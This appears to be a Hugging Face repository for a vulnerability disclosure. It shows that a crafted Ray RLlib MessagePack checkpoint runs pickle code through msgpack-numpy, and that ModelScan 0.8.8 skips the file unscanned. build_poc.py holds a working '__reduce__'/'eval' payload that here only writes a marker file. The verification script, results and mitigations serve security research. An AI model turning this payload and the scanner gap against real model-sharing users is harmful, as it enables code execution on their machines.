Upload folder using huggingface_hub
- README.md +107 -0
- artifact_manifest.json +8 -0
- build_poc.py +64 -0
- requirements.txt +5 -0
- results.json +44 -0
- scanner_output_dir.json +1 -0
- scanner_output_file.json +1 -0
- state.msgpack +3 -0
- verify_poc.py +141 -0
README.md
ADDED
@@ -0,0 +1,107 @@
# Benign MessagePack / RLlib Checkpoint Security PoC

This repository stages a safe proof-of-concept for a MessagePack-based ML checkpoint loading issue. The artifact is a 506-byte `state.msgpack` file that follows the Ray RLlib checkpoint state-file shape and carries a NumPy object-dtype array encoded through `msgpack-numpy`.

When the file is decoded through the MessagePack path of Ray RLlib's `restore_from_path()`, the `msgpack-numpy` 0.4.8 decoder reaches `pickle.loads()` for object-dtype array data. The embedded payload only writes a local marker file named `MSG_PACK_NUMPY_MARKER.txt`.

## Files

- `state.msgpack` - benign PoC checkpoint state file.
- `verify_poc.py` - verifies plain MessagePack parsing, direct `msgpack-numpy` parsing, and Ray RLlib restore behavior.
- `build_poc.py` - reproduces the artifact generation.
- `artifact_manifest.json` - SHA256, size, and marker details.
- `results.json` - local verification output.
- `scanner_output_file.json` - ModelScan 0.8.8 output for `state.msgpack`.
- `scanner_output_dir.json` - ModelScan 0.8.8 output for this staged folder.
- `requirements.txt` - pinned reproduction dependencies used for this validation.

## Tested Versions

- Python 3.12.12
- Ray 2.55.1
- msgpack 1.1.2
- msgpack-numpy 0.4.8
- NumPy 2.4.4
- ModelScan 0.8.8

## Reproduction

```bash
python -m venv .venv
.venv/Scripts/python -m pip install -r requirements.txt
.venv/Scripts/python build_poc.py
.venv/Scripts/python verify_poc.py
.venv/Scripts/modelscan -p state.msgpack -r json -o scanner_output_file.json --show-skipped
```

These commands use the Windows virtual-environment layout. On Linux/macOS, replace `.venv/Scripts/` with `.venv/bin/` for both `python` and `modelscan`.

Expected behavior:

- Plain `msgpack.load()` parses the file as data and does not create the marker.
- `msgpack_numpy.load()` creates `MSG_PACK_NUMPY_MARKER.txt` in the current working directory.
- Ray RLlib `Checkpointable.restore_from_path()` creates `MSG_PACK_NUMPY_MARKER.txt` in the current working directory.
- ModelScan 0.8.8 reports `total_scanned: 0` and skips `state.msgpack` as `SCAN_NOT_SUPPORTED`.
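
The expectations above can be checked mechanically against the JSON output files. The following is a minimal sketch and not part of the PoC scripts: the helper name `check_expected` is hypothetical, and the field names are taken from the `results.json` and `scanner_output_file.json` contents in this commit. The sample dictionaries are trimmed stand-ins for those files.

```python
def check_expected(results: dict, scan: dict) -> list:
    """Return human-readable deviations from the expected behavior (empty if none)."""
    problems = []
    # Plain msgpack must treat the file as inert data.
    if results["plain_msgpack_check"]["marker_created"]:
        problems.append("plain msgpack parsing created the marker")
    # Both NumPy-aware decode paths are expected to run the payload.
    for check in ("direct_msgpack_numpy_check", "ray_rllib_restore_check"):
        if not results[check]["marker_created"]:
            problems.append(f"{check} did not create the marker")
    summary = scan["summary"]
    if summary["scanned"]["total_scanned"] != 0:
        problems.append("ModelScan scanned at least one file")
    skipped = {
        (entry["source"], entry["category"])
        for entry in summary["skipped"]["skipped_files"]
    }
    if ("state.msgpack", "SCAN_NOT_SUPPORTED") not in skipped:
        problems.append("state.msgpack was not skipped as SCAN_NOT_SUPPORTED")
    return problems


# Hand-written stand-ins (assumption: trimmed copies of the real JSON files).
sample_results = {
    "plain_msgpack_check": {"marker_created": False},
    "direct_msgpack_numpy_check": {"marker_created": True},
    "ray_rllib_restore_check": {"marker_created": True},
}
sample_scan = {
    "summary": {
        "scanned": {"total_scanned": 0},
        "skipped": {
            "total_skipped": 1,
            "skipped_files": [
                {"category": "SCAN_NOT_SUPPORTED", "source": "state.msgpack"}
            ],
        },
    }
}

print(check_expected(sample_results, sample_scan))
```

To run it against a real reproduction, load the two files with `json.loads()` and pass the resulting dictionaries in place of the samples.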

## Evidence Summary

Artifact:

```text
SHA256: 3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465
Size: 506 bytes
```
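
Before decoding anything, a reader may want to confirm that a local copy of the artifact is the one described here. A minimal sketch using only the standard library follows; the helper name `matches_manifest` is hypothetical, while the digest and size constants are the values listed above.

```python
import hashlib
from pathlib import Path

# Values copied from the Evidence Summary / artifact_manifest.json.
EXPECTED_SHA256 = "3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465"
EXPECTED_SIZE = 506


def matches_manifest(path, sha256_hex: str, size_bytes: int) -> bool:
    """Return True if the file at `path` has the given size and SHA-256 digest."""
    data = Path(path).read_bytes()  # the artifact is tiny, so read it whole
    return len(data) == size_bytes and hashlib.sha256(data).hexdigest() == sha256_hex
```

Calling `matches_manifest("state.msgpack", EXPECTED_SHA256, EXPECTED_SIZE)` only hashes the bytes and never parses them, so it is safe to run on an untrusted copy. The same digest appears as the Git LFS `oid` for `state.msgpack` in this commit.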

Runtime:

```json
"ray_rllib_restore_check": {
  "restored_keys": ["format", "object_array", "safe_weights"],
  "object_array_type": "ndarray",
  "object_array_repr": "array([34], dtype=object)",
  "marker_created": true,
  "marker_text": "msgpack_numpy_object_array_marker\n"
}
```

Scanner:

```json
"scanned": {"total_scanned": 0},
"skipped": {
  "total_skipped": 1,
  "skipped_files": [{
    "category": "SCAN_NOT_SUPPORTED",
    "description": "Model Scan did not scan file",
    "source": "state.msgpack"
  }]
}
```

## Why This Is ML-Format Relevant

Ray RLlib documents checkpoints as model/training artifacts that can be saved to local disk or cloud storage and restored through `restore_from_path()` / `from_checkpoint()`. The docs state that checkpoint directories contain a `pickle` or `msgpack` state file, and current RLlib source loads `state.msgpack` with a `msgpack` module patched by `msgpack-numpy`.

Primary references:

- Ray RLlib checkpoint docs: https://docs.ray.io/en/latest/rllib/checkpoints.html
- Ray RLlib source for `state.msgpack` restore and `try_import_msgpack`: https://docs.ray.io/en/latest/_modules/ray/rllib/utils/checkpoints.html
- msgpack-numpy 0.4.8 decoder source: https://github.com/lebedov/msgpack-numpy/blob/0.4.8/msgpack_numpy.py
- ModelScan 0.8.8 supported scanner extensions: https://github.com/protectai/modelscan/blob/v0.8.8/modelscan/settings.py

## Security Impact

An attacker-controlled RLlib `.msgpack` checkpoint state file can trigger arbitrary Python execution when a victim restores the checkpoint through RLlib's MessagePack path. This PoC uses a harmless local marker write, but the primitive is Python pickle execution hidden inside a MessagePack/NumPy serialization layer.
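
Because the nested payload is ordinary pickle data, it can be inspected without being executed. The sketch below uses the standard-library `pickletools.genops()` to list the globals that a pickle stream references. It assumes the raw pickle bytes have already been pulled out of the MessagePack record. The helper name `referenced_globals` is hypothetical, and the `STACK_GLOBAL` handling is a simple heuristic that pairs the two most recently pushed strings, not a full pickle virtual machine.

```python
import pickle
import pickletools


def referenced_globals(data: bytes) -> list:
    """List (module, name) pairs referenced by a pickle stream, without loading it."""
    found = []
    strings = []  # string arguments seen so far, used to resolve STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            # pickletools reports these as a single "module name" string.
            module, _, name = arg.partition(" ")
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            # Heuristic: module and name are the last two strings pushed.
            if len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


# Harmless pickles built locally for demonstration.
data_only = pickle.dumps({"weights": [1.0, 2.0]}, protocol=4)
with_global = pickle.dumps(len, protocol=4)

print(referenced_globals(data_only))
print(referenced_globals(with_global))
```

A pickle that contains only plain data references no globals, while one that names a callable such as `builtins.eval` would show up in the returned list. Note that `pickletools.genops()` raises `ValueError` on truncated or malformed streams, so callers should treat that as a failed inspection rather than a clean result.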

Limitations:

- This is not a native parser memory-corruption issue.
- It requires a victim workflow that restores an untrusted Ray RLlib MessagePack checkpoint or otherwise decodes the artifact through `msgpack-numpy`.
- The scanner evidence is a ModelScan unsupported-format gap for a dangerous `.msgpack` artifact, not a claim that every Hugging Face scanner accepts the file as clean.

## Mitigations

- Do not restore untrusted RLlib MessagePack checkpoints.
- Reject or sanitize object-dtype arrays during MessagePack checkpoint restore.
- Avoid `msgpack_numpy.patch()` for untrusted checkpoint data, or make the object-dtype pickle path opt-in only.
- Add scanner support for `.msgpack` model artifacts that recursively detects nested pickle payloads in `msgpack-numpy` object-array records.
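
The rejection and scanner mitigations both depend on recognizing object-dtype records before a NumPy-aware decoder sees them. The following sketch walks a structure that was decoded with plain `msgpack` (no `msgpack-numpy` hook) and reports the paths of records flagged as object arrays. It assumes the record layout of msgpack-numpy 0.4.8: a map with `nd`, `type`, `kind`, and `data` keys, where a `kind` of `O` or a `type` of `|O` marks pickled data. That layout is an assumption here and should be confirmed against the decoder source linked above. The helper names and the sample structure are hypothetical.

```python
from typing import Any, Iterator


def _text(value: Any) -> Any:
    """Decode bytes to str so byte-string and text keys compare the same way."""
    return value.decode("ascii", "replace") if isinstance(value, bytes) else value


def find_object_array_records(node: Any, path: str = "$") -> Iterator[str]:
    """Yield paths of maps that look like msgpack-numpy object-dtype records."""
    if isinstance(node, dict):
        fields = {_text(key): value for key, value in node.items()}
        is_array_record = fields.get("nd") is True
        is_object_dtype = (
            _text(fields.get("kind")) == "O"
            or _text(fields.get("type")) in ("|O", "O")
        )
        if is_array_record and is_object_dtype:
            yield path
            return
        for key, value in fields.items():
            yield from find_object_array_records(value, f"{path}.{key}")
    elif isinstance(node, (list, tuple)):
        for index, value in enumerate(node):
            yield from find_object_array_records(value, f"{path}[{index}]")


# Hand-written stand-in for a plainly decoded state file (not real artifact bytes).
decoded = {
    "format": "ray_rllib_state_msgpack",
    "safe_weights": {b"nd": True, b"type": "<f4", b"kind": b"", b"shape": [3], b"data": b"\x00" * 12},
    "object_array": {b"nd": True, b"type": "|O", b"kind": b"O", b"shape": [1], b"data": b"<pickle bytes>"},
}

print(list(find_object_array_records(decoded)))
```

A restore wrapper or scanner could refuse to continue whenever the returned list is non-empty, which keeps the decision independent of whether the nested pickle itself looks malicious.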
artifact_manifest.json
ADDED
@@ -0,0 +1,8 @@
{
  "artifact": "state.msgpack",
  "sha256": "3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465",
  "size_bytes": 506,
  "marker_file": "MSG_PACK_NUMPY_MARKER.txt",
  "marker_text": "msgpack_numpy_object_array_marker",
  "impact": "Benign marker file is created when a loader decodes the object-dtype array through msgpack-numpy."
}
build_poc.py
ADDED
@@ -0,0 +1,64 @@
#!/usr/bin/env python
"""Build a benign Ray RLlib MessagePack checkpoint PoC artifact."""

from __future__ import annotations

import hashlib
import json
from pathlib import Path

import msgpack_numpy
import numpy as np


ARTIFACT_NAME = "state.msgpack"
MARKER_NAME = "MSG_PACK_NUMPY_MARKER.txt"
MARKER_TEXT = "msgpack_numpy_object_array_marker\n"


class Marker:
    def __reduce__(self):
        # Benign local marker-file proof. No network, persistence, or destructive action.
        code = (
            "__import__('pathlib').Path(%r).write_text(%r, encoding='utf-8')"
            % (MARKER_NAME, MARKER_TEXT)
        )
        return (eval, (code,))


def sha256(path: Path) -> str:
    """Return the hex SHA-256 digest of a file, read in 1 MiB chunks."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(1024 * 1024), b""):
            digest.update(chunk)
    return digest.hexdigest()


def main() -> None:
    out_dir = Path(__file__).resolve().parent
    artifact = out_dir / ARTIFACT_NAME

    # One ordinary float32 array plus one object-dtype array holding the marker.
    state = {
        "format": "ray_rllib_state_msgpack",
        "safe_weights": np.array([1.0, 2.0, 3.0], dtype=np.float32),
        "object_array": np.array([Marker()], dtype=object),
    }
    artifact.write_bytes(msgpack_numpy.packb(state, use_bin_type=True))

    # Record the digest and size so the artifact can be checked later.
    manifest = {
        "artifact": ARTIFACT_NAME,
        "sha256": sha256(artifact),
        "size_bytes": artifact.stat().st_size,
        "marker_file": MARKER_NAME,
        "marker_text": MARKER_TEXT.strip(),
        "impact": "Benign marker file is created when a loader decodes the object-dtype array through msgpack-numpy.",
    }
    (out_dir / "artifact_manifest.json").write_text(
        json.dumps(manifest, indent=2) + "\n",
        encoding="utf-8",
    )
    print(json.dumps(manifest, indent=2))


if __name__ == "__main__":
    main()
requirements.txt
ADDED
@@ -0,0 +1,5 @@
ray[rllib]==2.55.1
msgpack==1.1.2
msgpack-numpy==0.4.8
numpy==2.4.4
modelscan==0.8.8
results.json
ADDED
@@ -0,0 +1,44 @@
{
  "artifact": "C:\\Users\\Pragnyan\\dev\\huntr-exp1\\messagepack\\hf_messagepack_poc\\state.msgpack",
  "artifact_sha256": "3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465",
  "artifact_size_bytes": 506,
  "versions": {
    "python": "3.12.12 (main, Oct 28 2025, 14:15:42) [MSC v.1944 64 bit (AMD64)]",
    "ray": "2.55.1",
    "msgpack": "1.1.2",
    "msgpack-numpy": "0.4.8",
    "numpy": "2.4.4",
    "modelscan": "0.8.8"
  },
  "plain_msgpack_check": {
    "plain_msgpack_type": "dict",
    "plain_msgpack_keys": [
      "format",
      "object_array",
      "safe_weights"
    ],
    "marker_created": false
  },
  "direct_msgpack_numpy_check": {
    "msgpack_numpy_type": "dict",
    "msgpack_numpy_keys": [
      "format",
      "object_array",
      "safe_weights"
    ],
    "marker_created": true,
    "marker_text": "msgpack_numpy_object_array_marker\n"
  },
  "ray_rllib_restore_check": {
    "restored_keys": [
      "format",
      "object_array",
      "safe_weights"
    ],
    "object_array_type": "ndarray",
    "object_array_repr": "array([34], dtype=object)",
    "marker_created": true,
    "marker_text": "msgpack_numpy_object_array_marker\n"
  },
  "limitation": "This is ACE via msgpack-numpy object-array pickle decoding during RLlib msgpack checkpoint restore; it is not a native parser memory-corruption issue."
}
scanner_output_dir.json
ADDED
@@ -0,0 +1 @@
{"summary": {"total_issues_by_severity": {"LOW": 0, "MEDIUM": 0, "HIGH": 0, "CRITICAL": 0}, "total_issues": 0, "input_path": ".", "absolute_path": "C:\\Users\\Pragnyan\\dev\\huntr-exp1\\messagepack\\hf_messagepack_poc", "modelscan_version": "0.8.8", "timestamp": "2026-05-12T12:55:25.546341", "scanned": {"total_scanned": 0}, "skipped": {"total_skipped": 7, "skipped_files": [{"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "artifact_manifest.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "build_poc.py"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "results.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "scanner_output_dir.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "scanner_output_file.json"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "state.msgpack"}, {"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "verify_poc.py"}]}}, "issues": [], "errors": []}
scanner_output_file.json
ADDED
@@ -0,0 +1 @@
{"summary": {"total_issues_by_severity": {"LOW": 0, "MEDIUM": 0, "HIGH": 0, "CRITICAL": 0}, "total_issues": 0, "input_path": "state.msgpack", "absolute_path": "C:\\Users\\Pragnyan\\dev\\huntr-exp1\\messagepack\\hf_messagepack_poc", "modelscan_version": "0.8.8", "timestamp": "2026-05-12T12:55:25.524512", "scanned": {"total_scanned": 0}, "skipped": {"total_skipped": 1, "skipped_files": [{"category": "SCAN_NOT_SUPPORTED", "description": "Model Scan did not scan file", "source": "state.msgpack"}]}}, "issues": [], "errors": []}
state.msgpack
ADDED
@@ -0,0 +1,3 @@
version https://git-lfs.github.com/spec/v1
oid sha256:3ddf739096ea87558f341e1705b607510e7e7f3af4c37841b51bd8809b52e465
size 506
verify_poc.py
ADDED
@@ -0,0 +1,141 @@
#!/usr/bin/env python
"""Verify the benign MessagePack/model checkpoint deserialization PoC."""

from __future__ import annotations

import argparse
import hashlib
import importlib.metadata as metadata
import json
import sys
from pathlib import Path
from typing import Any, Dict, Optional, Tuple

import msgpack
import msgpack_numpy
import numpy as np
import ray
from ray.rllib.utils.checkpoints import Checkpointable


ARTIFACT_NAME = "state.msgpack"
MARKER_NAME = "MSG_PACK_NUMPY_MARKER.txt"


class DemoCheckpointable(Checkpointable):
    """Minimal Checkpointable that only records the state it is handed."""

    def __init__(self) -> None:
        self.restored_state: Optional[Dict[str, Any]] = None

    def get_state(self, components=None, *, not_components=None, **kwargs):
        return {}

    def set_state(self, state):
        self.restored_state = state

    def get_ctor_args_and_kwargs(self) -> Tuple[Tuple, Dict[str, Any]]:
        return (), {}


def sha256(path: Path) -> str:
    """Return the hex SHA-256 digest of a file, read in 1 MiB chunks."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(1024 * 1024), b""):
            digest.update(chunk)
    return digest.hexdigest()


def package_version(name: str) -> str:
    try:
        return metadata.version(name)
    except metadata.PackageNotFoundError:
        return "not installed"


def plain_msgpack_check(artifact: Path, marker: Path) -> Dict[str, Any]:
    """Decode with unpatched msgpack; the marker should not appear."""
    marker.unlink(missing_ok=True)
    with artifact.open("rb") as handle:
        data = msgpack.load(handle, raw=False, strict_map_key=False)
    return {
        "plain_msgpack_type": type(data).__name__,
        "plain_msgpack_keys": sorted(str(k) for k in data.keys()),
        "marker_created": marker.exists(),
    }


def rllib_restore_check(checkpoint_dir: Path, marker: Path) -> Dict[str, Any]:
    """Restore through RLlib's Checkpointable API and report the side effects."""
    marker.unlink(missing_ok=True)
    demo = DemoCheckpointable()
    demo.restore_from_path(checkpoint_dir)
    restored = demo.restored_state or {}
    marker_text = marker.read_text(encoding="utf-8") if marker.exists() else None
    object_value = restored.get("object_array")
    return {
        "restored_keys": sorted(restored.keys()),
        "object_array_type": type(object_value).__name__,
        "object_array_repr": repr(object_value),
        "marker_created": marker.exists(),
        "marker_text": marker_text,
    }


def direct_msgpack_numpy_check(artifact: Path, marker: Path) -> Dict[str, Any]:
    """Decode with msgpack-numpy directly; the marker is expected to appear."""
    marker.unlink(missing_ok=True)
    with artifact.open("rb") as handle:
        data = msgpack_numpy.load(handle, raw=False, strict_map_key=False)
    marker_text = marker.read_text(encoding="utf-8") if marker.exists() else None
    return {
        "msgpack_numpy_type": type(data).__name__,
        "msgpack_numpy_keys": sorted(data.keys()),
        "marker_created": marker.exists(),
        "marker_text": marker_text,
    }


def main() -> None:
    parser = argparse.ArgumentParser()
    parser.add_argument(
        "--artifact",
        type=Path,
        default=Path(__file__).resolve().parent / ARTIFACT_NAME,
    )
    parser.add_argument(
        "--results",
        type=Path,
        default=Path(__file__).resolve().parent / "results.json",
    )
    args = parser.parse_args()

    artifact = args.artifact.resolve()
    checkpoint_dir = artifact.parent
    # The payload writes to a relative path, so the marker lands in the working directory.
    marker = Path.cwd() / MARKER_NAME

    if not artifact.exists():
        raise FileNotFoundError(artifact)

    # The plain msgpack check runs first: the RLlib restore path is expected to
    # patch the msgpack module through msgpack-numpy, which would affect later calls.
    results = {
        "artifact": str(artifact),
        "artifact_sha256": sha256(artifact),
        "artifact_size_bytes": artifact.stat().st_size,
        "versions": {
            "python": sys.version,
            "ray": ray.__version__,
            "msgpack": package_version("msgpack"),
            "msgpack-numpy": package_version("msgpack-numpy"),
            "numpy": np.__version__,
            "modelscan": package_version("modelscan"),
        },
        "plain_msgpack_check": plain_msgpack_check(artifact, marker),
        "direct_msgpack_numpy_check": direct_msgpack_numpy_check(artifact, marker),
        "ray_rllib_restore_check": rllib_restore_check(checkpoint_dir, marker),
        "limitation": "This is ACE via msgpack-numpy object-array pickle decoding during RLlib msgpack checkpoint restore; it is not a native parser memory-corruption issue.",
    }

    args.results.write_text(json.dumps(results, indent=2, default=str) + "\n", encoding="utf-8")
    print(json.dumps(results, indent=2, default=str))

    if not results["ray_rllib_restore_check"]["marker_created"]:
        raise SystemExit("marker was not created through Ray RLlib restore path")


if __name__ == "__main__":
    main()